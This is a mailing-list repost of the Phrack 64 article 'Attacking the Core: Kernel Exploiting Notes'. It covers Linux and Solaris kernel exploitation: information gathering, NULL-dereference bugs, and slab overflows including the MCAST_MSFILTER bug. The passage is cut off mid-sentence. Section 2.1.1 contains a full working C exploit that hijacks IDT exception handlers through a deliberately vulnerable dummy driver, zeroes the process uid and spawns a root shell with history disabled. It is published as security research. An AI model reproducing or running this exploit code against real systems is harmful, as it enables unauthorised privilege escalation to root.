Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

[Full-disclosure] PHRACK 64: ATTACKING THE CORE

Subject: [Full-disclosure] PHRACK 64: ATTACKING THE CORE
Date: Fri, 25 May 2007 09:42:58 -0400
            _                                                  _
          _/B\_                                              _/W\_
          (* *)              Phrack #64 file 6               (* *)
          | - |                                              | - |
          |   | Attacking the Core : Kernel Exploiting Notes |   |
          |   |                                              |   |
          |   |       By sqrkkyu <sgrakkyu@antifork.org>     |   |
          |   |          twzi <twiz@email.it>                |   |
          |   |                                              |   |
          (______________________________________________________)



                             ==Phrack Inc.==

               Volume 0x00, Issue 0x00, Phile #0x00 of 0x00


|=------------=[ Attacking the Core : Kernel Exploiting Notes ]=----
-----=|
|=------------------------------------------------------------------
-----=|
|=-------------=[ sgrakkyu@antifork.org and twiz@email.it ]=--------
-----=|
|=------------------------=[ February 12 2007 ]=--------------------
-----=|


------[  Index 

  1 - The playground 

    1.1 - Kernel/Userland virtual address space layouts
    1.2 - Dummy device driver and real vulnerabilities
    1.3 - Notes about information gathering

  2 - Kernel vulnerabilities and bugs 

    2.1 - NULL/userspace dereference vulnerabilities
        2.1.1 - NULL/userspace dereference vulnerabilities : 
null_deref.c 
    2.2 - The Slab Allocator
        2.2.1 - Slab overflow vulnerabilities
        2.2.2 - Slab overflow exploiting : MCAST_MSFILTER
        2.2.3 - Slab overflow vulnerabilities : Solaris notes 
    2.3 - Stack overflow vulnerabilities 
        2.3.1 - UltraSPARC exploiting
        2.3.2 - A reliable Solaris/UltraSPARC exploit
    2.4 - A primer on logical bugs : race conditions 
        2.4.1 - Forcing a kernel path to sleep
        2.4.2 - AMD64 and race condition exploiting: sendmsg

  3 - Advanced scenarios 
    
    3.1 - PaX KERNEXEC & separated kernel/user space 
    3.2 - Remote Kernel Exploiting 
        3.2.1 - The Network Contest
        3.2.2 - Stack Frame Flow Recovery
        3.2.3 - Resources Restoring 
        3.2.4 - Copying the Stub
        3.2.5 - Executing Code in Userspace Context [Gimme Life!]
        3.2.6 - The Code : sendtwsk.c

  4 - Final words  

  5 - References

  6 - Sources : drivers and exploits [stuff.tgz]      

------[ Intro 


The latest years have seen an increasing interest towards kernel 
based
explotation. The growing diffusion of "security prevention" 
approaches
(no-exec stack, no-exec heap, ascii-armored library mmapping, 
mmap/stack
and generally virtual layout randomization, just to point out the 
most
known) has/is made/making userland explotation harder and harder. 
Moreover there has been an extensive work of auditing on 
application codes,
so that new bugs are generally more complex to handle and exploit. 

The attentions has so turned towards the core of the operating 
systems,
towards kernel (in)security. This paper will attempt to give an 
insight
into kernel explotation, with examples for IA-32, UltraSPARC and 
AMD64. 
Linux and Solaris will be the target operating systems. More 
precisely, an
architecture on turn will be the main covered for the three main
exploiting demonstration categories : slab (IA-32), stack 
(UltraSPARC) and
race condtion (AMD64). The details explained in those 'deep focus' 
apply,
thou, almost in toto to all the others exploiting scenarios.     

Since explotation examples are surely interesting but usually do 
not show
the "effective" complexity of taking advantages of vulnerabilities, 
a
couple of working real-life exploits will be presented too.   


------[ 1 - The playground 


Let's just point out that, before starting : "bruteforcing" and 
"kernel"
aren't two words that go well together. One can't just crash over 
and
over the kernel trying to guess the right return address or the good
alignment. An error in kernel explotation leads usually to a crash,
panic or unstable state of the operating system.
The "information gathering" step is so definitely important, just 
like
a good knowledge of the operating system layout.  
 

---[ 1.1 - Kernel/Userland virtual address space layouts 

From the userland point of view, we don't see almost anything of the
kernel layout nor of the addresses at which it is mapped [there are
indeed a couple of information that we can gather from userland, and
we're going to point them out after]. 
Netherless it is from the userland that we have to start to carry 
out our
attack and so a good knowledge of the kernel virtual memory layout
(and implementation) is, indeed, a must. 

There are two possible address space layouts :

- kernel space on behalf of user space (kernel page tables are
replicated over every process; the virtual address space is 
splitted in
two parts, one for the kernel and one for the processes).  
Kernels running on x86, AMD64 and sun4m/sun4d architectures usually 
have
this kind of implementation. 

- separated kernel and process address space (both can use the whole
address space). Such an implementation, to be efficient, requires a 
dedicated support from the underlaining architecture. It is the 
case of
the primary and secondary context register used in conjunction with 
the
ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture.   

To see the main advantage (from an exploiting perspective) of the 
first
approach over the second one we need to introduce the concept of
"process context".   
Any time the CPU is in "supervisor" mode (the well-known ring0 on 
ia-32),
the kernel path it is executing is said to be in interrupt context 
if it
hasn't a backing process.
Code in interrupt context can't block (for example waiting for 
demand
paging to bring in a referenced userspace page): the scheduler is
unable to know what to put to sleep (and what to wake up after). 

Code running in process context has instead an associated process
(usually the one that "generated" the kernel code path, for example
issuing a systemcall) and is free to block/sleep (and so, it's free 
to
reference the userland virtual address space). 
 
This is a good news on systems which implement a combined 
user/kernel
address space, since, while executing at kernel level, we can
dereference (or jump to) userland addresses. 
The advantages are obvious (and many) :

  - we don't have to "guess" where our shellcode will be and we can
    write it in C (which makes easier the writing, if needed, of 
long and
    somehow complex recovery code)

  - we don't have to face the problem of finding a suitable large 
and
    safe place to store it. 

  - we don't have to worry about no-exec page protection (we're 
free to
    mmap/mremap as we wish, and, obviously, load directly the code 
in
    .text segment, if we don't need to patch it at runtime). 

  - we can mmap large portions of the address space and fill them 
with 
    nops or nop-alike code/data (useful when we don't completely
    control the return address or the dereference)

  - we can easily take advantage of the so-called "NULL pointer
    dereference bugs" ("technically" described later on)
    
The space left to the kernel is so limited in size : on the x86
architecture it is 1 Gigabyte on Linux and it fluctuates on Solaris
depending on the amount of physical memory (check
usr/src/uts/i86pc/os/startup.c inside Opensolaris sources).
This fluctuation turned out to be necessary to avoid as much as 
possible
virtual memory ranges wasting and, at the same time, avoid pressure 
over
the space reserved to the kernel.  

The only limitation to kernel (and processes) virtual space on 
systems
implementing an userland/kerneland separated address space is given 
by the
architecture (UltraSPARC I and II can reference only 44bit of the 
whole
64bit addressable space. This VA-hole is placed among 
0x0000080000000000
and 0xFFFFF7FFFFFFFFFF).  

This memory model makes explotation indeed harder, because we can't
directly dereference the userspace. The previously cited NULL 
pointer
dereferences are pretty much un-exploitable.
Moreover, we can't rely on "valid" userland addresses as a place to 
store
our shellcode (or any other kernel emulation data), neither we can 
"return
to userspace". 

We won't go more in details here with a teorical description of the
architectures (you can check the reference manuals at [1], [2] and 
[3])
since we've preferred to couple the analysis of the architectural 
and
operating systems internal aspects relevant to explotation with the
effective exploiting codes presentation.


---[ 1.2 - Dummy device driver and real vulnerabilities 

As we said in the introduction, we're going to present a couple of 
real
working exploit, hoping to give a better insight into the whole 
kernel
explotation process. 
We've written exploit for : 

-  MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab
   overflow exploiting

-  sendmsg vulnerability [5], used to demonstrate an effective race
   condition (and a stack overflow on AMD64) 

-  madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a 
real
   remote exploit for the linux kernel. That exploit was already 
released
   at [22] before the exit of this paper (which has a more detailed
   discussion of it and another 'dummy based' exploit for a more 
complex
   scenario)

Moreover, we've written a dummy device driver (for Linux and 
Solaris) to
demonstrate with examples the techniques presented. 
A more complex remote exploit (as previously mentioned) and an 
exploit 
capable to circumvent Linux with PaX/KERNEXEC (and 
userspace/kernelspace
separation) will be presented too.

---[ 1.3 - Notes about information gathering 


Remember when we were talking about information gathering ? Nearly 
every
operating systems 'exports' to userland information useful for 
developing
and debugging. Both Linux and Solaris (we're not taking in account 
now
'security patches') expose readable by the user the list and 
addresses of
their exported symbols (symbols that module writer can reference) :
/proc/ksyms on Linux 2.4, /proc/kallsyms on Linux 2.6 and 
/dev/ksyms on
Solaris (the first two are text files, the last one is an ELF with 
SYMTAB
section).
Those files provide useful information about what is compiled in 
inside
the kernel and at what addresses are some functions and structs, 
addresses
that we can gather at runtime and use to increase the reliability 
of our
exploit. 

But theese information could be missing on some environment, the 
/proc
filesystem could be un-mounted or the kernel compiled (along with 
some
security switch/patch) to not export them. 
This is more a Linux problem than a Solaris one, nowadays. Solaris 
exports
way more information than Linux (probably to aid in debugging 
without
having the sources) to the userland. Every module is shown with its
loading address by 'modinfo', the proc interface exports the 
address of
the kernel 'proc_t' struct to the userland (giving a crucial 
entrypoint,
as we will see, for the explotation on UltraSPARC systems) and the 
'kstat'
utility lets us investigate on many kernel parameters. 

In absence of /proc (and /sys, on Linux 2.6) there's another place 
we can
gather information from, the kernel image on the filesystem. 
There are actually two possible favourable situations :

  - the image is somewhere on the filesystem and it's readable, 
which is
    the default for many Linux distributions and for Solaris

  - the target host is running a default kernel image, both from
    installation or taken from repository. In that situation is 
just a
    matter of recreating the same image on our system and infere 
from it. 
    This should be always possible on Solaris, given the patchlevel 
(taken
    from 'uname' and/or 'showrev -p'). 
    Things could change if OpenSolaris takes place, we'll see. 

The presence of the image (or the possibility of knowing it) is 
crucial
for the KERN_EXEC/separated userspace/kernelspace environment 
explotation
presented at the end of the paper. 

Given we don't have exported information and the careful 
administrator has
removed running kernel images (and, logically, in absence of kernel 
memory
leaks ;)) we've one last resource that can help in explotation : the
architecture. 
Let's take the x86 arch, a process running at ring3 may query the 
logical
address and offset/attribute of processor tables GDT,LDT,IDT,TSS :

- through 'sgdt' we get the base address and max offset of the GDT 
- through 'sldt' we can get the GDT entry index of current LDT 
- through 'sidt' we can get the base address and max offset of IDT 
- through 'str'  we can get the GDT entry index of the current TSS 

The best choice (not the only one possible) in that case is the 
IDT. The
possibility to change just a single byte in a controlled place of 
it 
leads to a fully working reliable exploit [*]. 

[*] The idea here is to modify the MSB of the base_address of an 
IDT entry
    and so "hijack" the exception handler. Logically we need a 
controlled
    byte overwriting or a partially controlled one with byte value 
below
    the 'kernelbase' value, so that we can make it point into the 
userland
    portion. We won't go in deeper details about the IDT
    layout/implementation here, you can find them inside processor 
manuals
    [1] and kad's phrack59 article "Handling the Interrupt 
Descriptor
    Table" [6].
    The NULL pointer dereference exploit presented for Linux 
implements
    this technique.  

As important as the information gathering step is the recovery 
step, which
aims to leave the kernel in a consistent state. This step is usually
performed inside the shellcode itself or just after the exploit has
(successfully) taken place, by using /dev/kmem or a loadable module 
(if
possible). 
This step is logically exploit-dependant, so we will just explain 
it along
with the examples (making a categorization would be pointless). 


------[ 2 - Kernel vulnerabilities and bugs 

 
We start now with an excursus over the various typologies of kernel
vulnerabilities. The kernel is a big and complex beast, so even if 
we're
going to track down some "common" scenarios, there are a lot of more
possible "logical bugs" that can lead to a system compromise.

We will cover stack based, "heap" (better, slab) based and 
NULL/userspace
dereference vulnerabilities. As an example of a "logical bug" a 
whole
chapter is dedicated to race condition and techniques to force a 
kernel
path to sleep/reschedule (along with a real exploit for the sendmsg 
[4]
vulnerability on AMD64). 

We won't cover in this paper the range of vulnerabilities related to
virtual memory logical errors, since those have been already 
extensively
described and cleverly exploited, on Linux, by iSEC [7] people.
Moreover, it's nearly useless, in our opinion, to create a 
"crafted" 
demonstrative vulnerable code for logical bugs and we weren't aware 
of any
_public_ vuln of this kind on Solaris. If you are, feel free to 
submit it,
we'll be happy to work over ;). 


---[ 2.1 - NULL/userspace dereference vulnerabilities 


This kind of vulnerability derives from the using of a pointer
not-initialized (generally having a NULL value) or trashed, so that 
it
points inside the userspace part of the virtual memory address 
space.
The normal behaviour of an operating system in such a situation is 
an oops
or a crash (depending on the degree of severity of the dereference) 
while
attempting to access un-mapped memory. 

But we can, obviously, mmap that memory range and let the kernel 
find
"valid" malicius data. That's more than enough to gain root 
priviledges. 
We can delineate two possible scenarios :

  - instruction pointer modification (direct call/jmp dereference,
    called function pointers inside a struct, etc)

  - "controlled" write on kernelspace 

The first kind of vulnerability is really trivial to exploit, it's 
just a
matter of mmapping the referenced page and put our shellcode there.
If the dereferenced address is a struct with inside a function 
pointer (or
a chain of struct with somewhere a function pointer), it is just a 
matter
of emulating in userspace those struct, make point the function 
pointer
to our shellcode and let/force the kernel path to call it.

We won't show an example of this kind of vulnerability since this 
is the
"last stage" of any more complex exploit (as we will see, we'll be 
always
trying, when possible, to jump to userspace).  

The second kind of vulnerability is a little more complex, since we 
can't
directly modify the instruction pointer, but we've the possibility 
to
write anywhere in kernel memory (with controlled or uncontrolled 
data). 

Let's get a look to that snipped of code, taken from our Linux dummy
device driver :

< stuff/drivers/linux/dummy.h >

[...]

struct user_data_ioctl
{
  int size;  
  char *buffer;
};

< / >

< stuff/drivers/linux/dummy.c >

static int alloc_info(unsigned long sub_cmd)
{
  struct user_data_ioctl user_info;
  struct info_user *info;
  struct user_perm *perm;
  
[...]

  if(copy_from_user(&user_info,
                    (void __user*)sub_cmd,
                    sizeof(struct user_data_ioctl)))
    return -EFAULT;

  if(user_info.size > MAX_STORE_SIZE)  [1]
    return -ENOENT;

  info = kmalloc(sizeof(struct info_user), GFP_KERNEL);
  if(!info)
    return -ENOMEM;

  perm = kmalloc(sizeof(struct user_perm), GFP_KERNEL);
  if(!perm)
    return -ENOMEM;

  info->timestamp = 0;//sched_clock();
  info->max_size  = user_info.size;
  info->data = kmalloc(user_info.size, GFP_KERNEL); [2]
  /* unchecked alloc */

  perm->uid = current->uid;
  info->data->perm = perm; [3]

  glob_info = info;

[...]

static int store_info(unsigned long sub_cmd)
{

[...]

  glob_info->data->perm->uid = current->uid; [4]

[...]   

< / > 

Due to the integer signedness issue at [1], we can pass a huge value
to the kmalloc at [2], making it fail (and so return NULL). 
The lack of checking at that point leaves a NULL value in the info-
data
pointer, which is later used, at [3] and also inside store_info at 
[4] to
save the current uid value. 

What we have to do to exploit such a code is simply mmap the zero 
page
(0x00000000 - NULL) at userspace, make the kmalloc fail by passing a
negative value and then prepare a 'fake' data struct in the 
previously
mmapped area, providing a working pointers for 'perm' and thus 
being able
to write our 'uid' anywhere in memory.  

At that point we have many ways to exploit the vulnerable code 
(exploiting
while being able to write anywhere some arbitrary or, in that case,
partially controlled data is indeed limited only by imagination), 
but it's
better to find a "working everywhere" way.

As we said above, we're going to use the IDT and overwrite one of 
its
entries (more precisely a Trap Gate, so that we're able to hijack an
exception handler and redirect the code-flow towards userspace).
Each IDT entry is 64-bit (8-bytes) long and we want to overflow the
'base_offset' value of it, to be able to modify the MSB of the 
exception
handler routine address and thus redirect it below PAGE_OFFSET
(0xc0000000) value. 
   
Since the higher 16 bits are in the 7th and 8th byte of the IDT 
entry,
that one is our target, but we're are writing at [4] 4 bytes for 
the 'uid'
value, so we're going to trash the next entry. It is better to use 
two
adiacent 'seldomly used' entries (in case, for some strange reason,
something went bad) and we have decided to use the 4th and 5th 
entries :
#OF (Overflow Exception) and #BR (BOUND Range Exeeded Exeption).

At that point we don't control completely the return address, but 
that's
not a big problem, since we can mmap a large region of the 
userspace and
fill it with NOPs, to prepare a comfortable and safe landing point 
for our
exploit. The last thing we have to do is to restore, once we get the
control flow at userspace, the original IDT entries, hardcoding the 
values
inside the shellcode stub or using an lkm or /dev/kmem patching 
code. 

At that point our exploit is ready to be launched for our first
'rootshell'. 

As a last (indeed obvious) note, NULL dereference vulnerabilities 
are 
only exploitable on 'combined userspace and kernelspace' memory 
model
operating systems.


---[ 2.1.1 - NULL/userspace dereference vulnerabilities : 
null_deref.c  

< stuff/expl/null_deref.c >

#include <sys/ioctl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE          "/dev/dummy"
#define NOP             0x90
#define STACK_SIZE      8192

//#define STACK_SIZE 4096


#define PAGE_SIZE       0x1000
#define PAGE_OFFSET     12
#define PAGE_MASK       ~(PAGE_SIZE -1)

#define ANTANI          "antani"

uint32_t        bound_check[2]={0x00,0x00};
extern void     do_it();
uid_t           UID;

void do_bound_check()
{
        asm volatile("bound %1, %0\t\n" : "=m"(bound_check) : 
"a"(0xFF));
}

/* simple shell spown */
void get_root()
{
  char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
  char *envp[] = { "TERM=linux", "PS1=y0y0\\$", 
"BASH_HISTORY=/dev/null",
                   "HISTORY=/dev/null", "history=/dev/null",
                   
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
, NULL };

  execve("/bin/sh", argv, envp);
  fprintf(stderr, "[**] Execve failed\n");
  exit(-1);
}



/* this function is called by fake exception handler: take 0 uid 
and restore trashed entry */
void give_priv_and_restore(unsigned int thread)
{
  int i;
  unsigned short addr;
  unsigned int* p = (unsigned int*)thread;

  /* simple trick */
  for(i=0; i < 0x100; i++)
  if( (p[i] == UID) && (p[i+1] == UID) && (p[i+2] == UID) && 
(p[i+3] == UID) )
    p[i] = 0, p[i+1] = 0;

}


#define CODE_SIZE       0x1e


void dummy(void)
{
asm("do_it:;"
    "addl $6, (%%esp);"  // after bound exception EIP points again 
to the bound instruction
    "pusha;"
    "movl %%esp, %%eax;"
    "andl %0, %%eax;"
    "movl (%%eax), %%eax;"
    "add $100, %%eax;"
    "pushl %%eax;"
    "movl $give_priv_and_restore, %%ebx;"
    "call *%%ebx;"
    "popl %%eax;"
    "popa;"
    "iret;"
    "nop;nop;nop;nop;"
   :: "i"( ~(STACK_SIZE -1))
);
return;
}



struct idt_struct
{
  uint16_t limit;
  uint32_t base;
} __attribute__((packed));


static char *allocate_frame_chunk(unsigned int base_addr,
                                  unsigned int size,
                                  void* code_addr)
{
  unsigned int round_addr = base_addr & PAGE_MASK;
  unsigned int diff       = base_addr - round_addr;
  unsigned int len        = (size + diff + (PAGE_SIZE-1)) & 
PAGE_MASK;

  char *map_addr = mmap((void*)round_addr,
                        len,
                        PROT_READ|PROT_WRITE,
                        MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,
                        0,
                        0);
  if(map_addr == MAP_FAILED)
    return MAP_FAILED;

  if(code_addr)
  {
    memset(map_addr, NOP, len);
    memcpy(map_addr, code_addr, size);
  }
  else
    memset(map_addr, 0x00, len);

  return (char*)base_addr;
}

inline unsigned int *get_zero_page(unsigned int size)
{
  return (unsigned int*)allocate_frame_chunk(0x00000000, size, 
NULL);
}

#define BOUND_ENTRY 5
unsigned int get_BOUND_address()
{
        struct idt_struct idt;
        asm volatile("sidt %0\t\n" : "=m"(idt));
        return idt.base + (8*BOUND_ENTRY);
}

unsigned int prepare_jump_code()
{
  UID = getuid();       /* set global uid */
  unsigned int base_address = ((UID & 0x0000FF00) << 16) + ((UID & 
0xFF) << 16);
  printf("Using base address of: 0x%08x-0x%08x\n", base_address, 
base_address + 0x20000 -1);
  char *addr = allocate_frame_chunk(base_address, 0x20000, NULL);
  if(addr == MAP_FAILED)
  {
    perror("unable to mmap jump code");
    exit(-1);
  }

  memset((void*)base_address, NOP, 0x20000);
  memcpy((void*)(base_address + 0x10000), do_it, CODE_SIZE);

  return base_address;
}

int main(int argc, char *argv[])
{
  struct user_data_ioctl user_ioctl;
  unsigned int *zero_page, *jump_pages, save_ptr;

  zero_page = get_zero_page(PAGE_SIZE);
  if(zero_page == MAP_FAILED)
  {
    perror("mmap: unable to map zero page");
    exit(-1);
  }

  jump_pages = (unsigned int*)prepare_jump_code();


  int ret, fd = open(DEVICE,  O_RDONLY), alloc_size;

  if(argc > 1)
    alloc_size = atoi(argv[1]);
  else
   alloc_size  = PAGE_SIZE-8;

  if(fd < 0)
  {
    perror("open: dummy device");
    exit(-1);
  }

  memset(&user_ioctl, 0x00, sizeof(struct user_data_ioctl));
  user_ioctl.size = alloc_size;


  ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, &user_ioctl);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_ALLOC_INFO");
    exit(-1);
  }


  /* save old struct ptr stored by kernel in the first word */
  save_ptr = *zero_page;

  /* compute the new ptr inside the IDT table between BOUND and 
INVALIDOP exception */
  printf("IDT bound: %x\n", get_BOUND_address());
  *zero_page = get_BOUND_address() + 6;

  user_ioctl.size=strlen(ANTANI)+1;
  user_ioctl.buffer=ANTANI;

  ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl);

  getchar();
  do_bound_check();

  /* restore trashed ptr */
  *zero_page = save_ptr;

  ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_FREE_INFO");
    exit(-1);
  }

  get_root();

  return 0;
}

< / > 



---[ 2.2 - The Slab Allocator 


The main purpose of a slab allocator is to fasten up the
allocation/deallocation of heavily used small 'objects' and to 
reduce the
fragmentation that would derive from using the page-based one.
Both Solaris and Linux implement a slab memory allocator which 
derives
from the one described by Bonwick [8] in 1994 and implemented in 
Solaris
2.4.

The idea behind is, basically : objects of the same type are grouped
together inside a cache in their constructed form. The cache is 
divided in
'slabs', consisting of one or more contiguos page frames.   
Everytime the Operating Systems needs more objects, new page frames 
(and
thus new 'slabs') are allocated and the object inside are 
constructed.
Whenever a caller needs one of this objects, it gets returned an 
already
prepared one, that it has only to fill with valid data. When an 
object is
'freed', it doesn't get destructed, but simply returned to its slab 
and
marked as available. 

Caches are created for the most used objects/structs inside the 
operating
system, for example those representing inodes, virtual memory 
areas, etc. 
General-purpose caches, suitables for small memory allocations, are 
created too, one for each power of two, so that internal 
fragmentation is
guaranted to be at least below 50%. 
The Linux kmalloc() and the Solaris kmem_alloc() functions use 
exactly
those latter described caches. Since it is up to the caller to 
'clean' the
object returned from a slab (which could contain 'dead' data), 
wrapper
functions that return zeroed memory are usually provided too 
(kzalloc(),
kmem_zalloc()). 

An important (from an exploiting perspective) 'feature' of the slab
allocator is the 'bufctl', which is meaningful only inside a free 
object,
and is used to indicate the 'next free object'.
A list of free object that behaves just like a LIFO is thus 
created, and
we'll see in a short that it is crucial for reliable explotation. 

To each slab is associated a controlling struct (kmem_slab_t on 
Solaris,
slab_t on Linux) which is stored inside the slab (at the start, on 
Linux,
at the end, on Solaris) if the object size is below a given limit 
(1/8 of
the page), or outside it.
Since there's a 'cache' per 'object type', it's not guaranted at 
all that
those 'objects' will stay exactly in a page boundary inside the 
slab. That
'free' space (space not belonging to any object, nor to the slab
controlling struct) is used to 'color' the slab, respecting the 
object
alignment (if 'free' < 'alignment' no coloring takes place).

The first object is thus saved at a 'different offset' inside the 
slab,
given from 'color value' * 'alignment', (and, consequently, the same
happens to all the subsequent objects), so that object of the same 
size in
different slabs will less likely end up in the same hardware cache 
lines. 

We won't go more in details about the Slab Allocator here, since it 
is
well and extensively explained in many other places, most notably 
at [9],
[10], and [11], and we move towards effective explotation. 
Some more implementation details will be given, thou, along with the
exploiting techniques explanation.


---[ 2.2.1 - Slab overflow vulnerabilities  


NOTE: as we said before, Solaris and Linux have two different 
function to
alloc from the general purpose caches, kmem_alloc() and kmalloc(). 
That
two functions behave basically in the same manner, so, from now on 
we'll
just use 'kmalloc' and 'kmalloc'ed memory' in the discussion, 
referring
thou to both the operating systems implementation. 

A slab overflow is simply the writing past the buffer boundaries of 
a
kmalloc'ed object. The result of this overflow can be :

- overwriting an adiacent in-slab object. 
- overwriting a page next to the slab one, in the case we're 
overwriting
  past the last object.
- overwriting the control structure associated with the slab 
(Solaris
  only)
   
The first case is the one we're going to show an exploit for. The 
main
idea on such a situation is to fill the slabs (we can track the slab
status thanks to /proc/slabinfo on Linux and kstat -n 'cache_name' 
on
Solaris) so that a new one is necessary.
We do that to be sure that we'll have a 'controlled' bufctl : since 
the
whole slabs were full, we got a new page, along with a 'fresh' 
bufctl 
pointer starting from the first object.

At that point we alloc two objects, free the first one and trigger 
the
vulnerable code : it will request a new object and overwrite right 
into
the previously allocated second one. If a pointer inside this second
object is stored and then used (after the overflow) it is under our
control.
This approach is very reliable.  

The second case is more complex, since we haven't an object with a 
pointer
or any modifiable data value of interest to overwrite into. We 
still have
one chance, thou, using the page frame allocator. 
We start eating a lot of memory requesting the kind of 'page' we 
want to
overflow into (for example, tons of filedescriptor), putting the 
memory
under pressure. At that point we start freeing a couple of them, so 
that
the total amount counts for a page.  
At that point we start filling the slab so that a new page is 
requested.
If we've been lucky the new page is going to be just before one of 
the
previously allocated ones and we've now the chance to overwrite it. 

The main point affecting the reliability of such an exploit is : 

  - it's not trivial to 'isolate' a given struct/data to mass alloc 
at the
    first step, without having also other kernel structs/data 
growing
    together with.
    An example will clarify : to allocate tons of file descriptor 
we need
    to create a large amount of threads. That translates in the 
allocation
    of all the relative control structs which could end up placed 
right
    after our overflowing buffer.

The third case is possible only on Solaris, and only on slabs which 
keep
objects smaller than 'page_size >> 3'. Since Solaris keeps the 
kmem_slab
struct at the end of the slab we can use the overflow of the last 
object
to overwrite data inside it. 

In the latter two 'typology' of exploit presented we have to take in
account slab coloring. Both the operating systems store the 'next 
color
offset' inside the cache descriptor, and update it at every slab
allocation (let's see an example from OpenSolaris sources) :

< usr/src/uts/common/os/kmem.c >

static kmem_slab_t *
kmem_slab_create(kmem_cache_t *cp, int kmflag)
{
[...]
        size_t color, chunks;
[...]
        color = cp->cache_color + cp->cache_align;
        if (color > cp->cache_maxcolor)
                color = cp->cache_mincolor;
        cp->cache_color = color;

< / >

'mincolor' and 'maxcolor' are calculated at cache creation and 
represent
the boundaries of available caching :

# uname -a
SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
# kstat -n file_cache | grep slab
        slab_alloc                      280
        slab_create                     2
        slab_destroy                    0
        slab_free                       0
        slab_size                       8192
# kstat -n file_cache | grep align
        align                           8
# kstat -n file_cache | grep buf_size
        buf_size                        56
# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
::sizeof kmem_slab_t
sizeof (kmem_slab_t) = 0x38
::kmem_cache ! grep file_cache
00000300005fed88 file_cache                0000 000000       56     
 290
00000300005fed88::print kmem_cache_t cache_mincolor
cache_mincolor = 0
00000300005fed88::print kmem_cache_t cache_maxcolor
cache_maxcolor = 0x10
00000300005fed88::print kmem_cache_t cache_color
cache_color = 0x10
::quit

As you can see, from kstat we know that 2 slabs have been created 
and we
know the alignment, which is 8. Object size is 56 bytes and the 
size of
the in-slab control struct is 56, too. Each slab is 8192, which, 
modulo 56
gives out exactly 16, which is the maxcolor value (the color range 
is thus
0 - 16, which leads to three possible coloring with an alignment of 
8). 

Based on the previous snippet of code, we know that first 
allocation had
a coloring of 8 ( mincolor == 0 + align == 8 ), the second one of 16
(which is the value still recorded inside the kmem_cache_t). 
If we were for exhausting this slab and get a new one we would know 
for
sure that the coloring would be 0. 

Linux uses a similar 'circolar' coloring too, just look forward for
'kmem_cache_t'->colour_next setting and incrementation. 

Both the operating systems don't decrement the color value upon 
freeing of
a slab, so that has to be taken in account too (easy to do on 
Solaris,
since slab_create is the maximum number of slabs created).


---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILTER 


Given the technical basis to understand and exploit a slab 
overflow, it's
time for a practical example. 
We're presenting here an exploit for the MCAST_MSFILTER [4] 
vulnerability
found by iSEC people :

< linux-2.4.24/net/ipv4/ip_sockglue.c >

case MCAST_MSFILTER:
{
        struct sockaddr_in *psin;
        struct ip_msfilter *msf = 0;
        struct group_filter *gsf = 0;
        int msize, i, ifindex;

        if (optlen < GROUP_FILTER_SIZE(0))
                goto e_inval;
        gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL); [2]
        if (gsf == 0) {
                err = -ENOBUFS;
                break;
        }
        err = -EFAULT;
        if (copy_from_user(gsf, optval, optlen)) {  [3]
                goto mc_msf_out;
        }
        if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) { [4]
                err = EINVAL;
                goto mc_msf_out;
        }
        msize = IP_MSFILTER_SIZE(gsf->gf_numsrc);  [1]
        msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL); [7]
        if (msf == 0) {
                err = -ENOBUFS;
                goto mc_msf_out;
        }
        
        [...]

        msf->imsf_multiaddr = psin->sin_addr.s_addr;
        msf->imsf_interface = 0;
        msf->imsf_fmode = gsf->gf_fmode;
        msf->imsf_numsrc = gsf->gf_numsrc;
        err = -EADDRNOTAVAIL;
        for (i=0; i<gsf->gf_numsrc; ++i) {  [5]
                psin = (struct sockaddr_in *)&gsf->gf_slist[i];

                if (psin->sin_family != AF_INET) [8]
                        goto mc_msf_out;
                msf->imsf_slist[i] = psin->sin_addr.s_addr; [6]

[...]
        mc_msf_out:
                        if (msf)
                                kfree(msf);
                        if (gsf)
                                kfree(gsf);
                        break;

[...]

< / >

< linux-2.4.24/include/linux/in.h >

#define IP_MSFILTER_SIZE(numsrc) \    [1]
        (sizeof(struct ip_msfilter) - sizeof(__u32) \
        + (numsrc) * sizeof(__u32))

[...]

#define GROUP_FILTER_SIZE(numsrc) \   [4]
        (sizeof(struct group_filter) - sizeof(struct
__kernel_sockaddr_storage) \
        + (numsrc) * sizeof(struct __kernel_sockaddr_storage))

< / >


The vulnerability consist of an integer overflow at [1], since we 
control
the gsf struct as you can see from [2] and [3].
The check at [4] proved to be, initially, a problem, which was 
resolved
thanks to the slab property of not cleaning objects on free (back 
on that
in a short).
The for loop at [5] is where we effectively do the overflow, by 
writing,
at [6], the 'psin->sin_addr.s_addr' passed inside the gsf struct 
over the
previously allocated msf [7] struct (kmalloc'ed with bad calculated 
'msize' value). 
This for loop is a godsend, because thanks to the check at [8] we 
are able
to avoid the classical problem with integer overflow derived bugs 
(that is
writing _a lot_ after the buffer due to the usually huge value used 
to
trigger the overflow) and exit cleanly through mc_msf_out. 

As explained before, while describing the 'first explotation 
approach', we
